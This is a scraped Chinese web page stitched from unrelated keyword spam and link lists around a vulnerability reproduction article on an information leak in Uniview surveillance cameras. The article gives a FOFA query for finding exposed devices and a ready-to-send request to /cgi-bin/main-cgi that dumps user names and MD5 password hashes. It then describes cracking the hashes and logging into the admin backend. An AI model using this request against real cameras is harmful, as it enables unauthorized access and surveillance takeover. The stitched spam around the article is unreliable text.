当前位置: 首页 > news >正文

网站开发的报告书小发明小制作简单易学

网站开发的报告书,小发明小制作简单易学,网络营销方式分析论文,边个网站可以接模具做宇视科技视频监控 main-cgi 文件信息泄露漏洞 一、产品简介二、漏概述三、复现环境四、漏洞检测手工抓包自动化检测 免责声明#xff1a;请勿利用文章内的相关技术从事非法测试#xff0c;由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失#… 宇视科技视频监控 main-cgi 文件信息泄露漏洞 一、产品简介二、漏概述三、复现环境四、漏洞检测手工抓包自动化检测 免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 一、产品简介 宇视(Uniview)高清网络摄像机是一种高性能的网络摄像机它可以通过网络进行视频传输和监控。该摄像机采用先进的视频技术具有高清晰度、低照度、宽动态等特点能够提供高质量的视频图像。 二、漏概述 宇视(Uniview)高清网络摄像机存在信息泄露漏洞攻击者可以通过解密泄露信息获取管理员账号密码登陆后台控制整个系统最终导致系统处于极度不安全状态。 三、复现环境 FOFA: app“uniview-视频监控” 四、漏洞检测 POC GET /cgi-bin/main-cgi?json{cmd:255,szUserName:,u32UserLoginHandle:-1} HTTP/1.1 Host: your-ip Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15手工抓包 如果回显200 ok并且能看到有UserName关键字的说明成功 我们也可以看到密码部分是md5加密的需要去解密 直接登录后台 如果你遇到了插件异常 请直接使用IE浏览器访问 自动化检测 小龙POC这里依然还是顶着干 小龙POC开源传送门: 小龙POC工具 小龙POCexe传送门: 小龙POC工具
http://www.hkea.cn/news/14592963/

相关文章:

  • 一个备案可以做几个网站合肥做网站cnfg
  • 用护卫神做网站电商模式有哪几种
  • 论坛seo网站seo快速优化方法
  • 天津平台网站建设哪家好怎样建设美丽中国?
  • 通过平台建网站做网站前端工资
  • 陕西建设网官方网站怎样下载建设部网站
  • 广州建设局网站家具东莞网站建设技术支持
  • 论坛类网站开发报价电子商务网站建设课后习题答案
  • 南京装修公司做网站icp
  • 怎么在ps做网站首页wordpress免费采集器
  • 教你学做窗帘的网站加强网站的建设工作
  • 株洲网站建设哪家好网站建设配色方案
  • 门户网站html手机网站免费空间
  • 什么网站做的好看遂宁网站seo
  • 营销型网站建设要求坪山做网站
  • 镇江市丹徒区建设局网站西安比较好的网络公司
  • 北京网站设计哪家公司好深圳官方网站制作
  • wordpress同步豆瓣优化方案英语必修三
  • 年轻人常用网站高级搜索指令
  • 主题资源网站建设 模块五作业天津网站建设服务公司
  • php旅游网站论文wordpress wpex
  • 市桥有经验的网站建设wordpress 后台颜色
  • 那个公司建设网站设计发布平台
  • 手机访问pc网站跳转临沂网站建设设计
  • 网站接入网方式梁山网站建设公司
  • 福州专业网站建设价格怎样做影视网站
  • 用vue做网站的实例现货黄金什么网站可以做直播
  • 网站建设视频图片长沙债务优化公司
  • 广州建设官方网站工信部门备案网站获取的icp备案号
  • 什么叫展示型网站qq群推广引流免费网站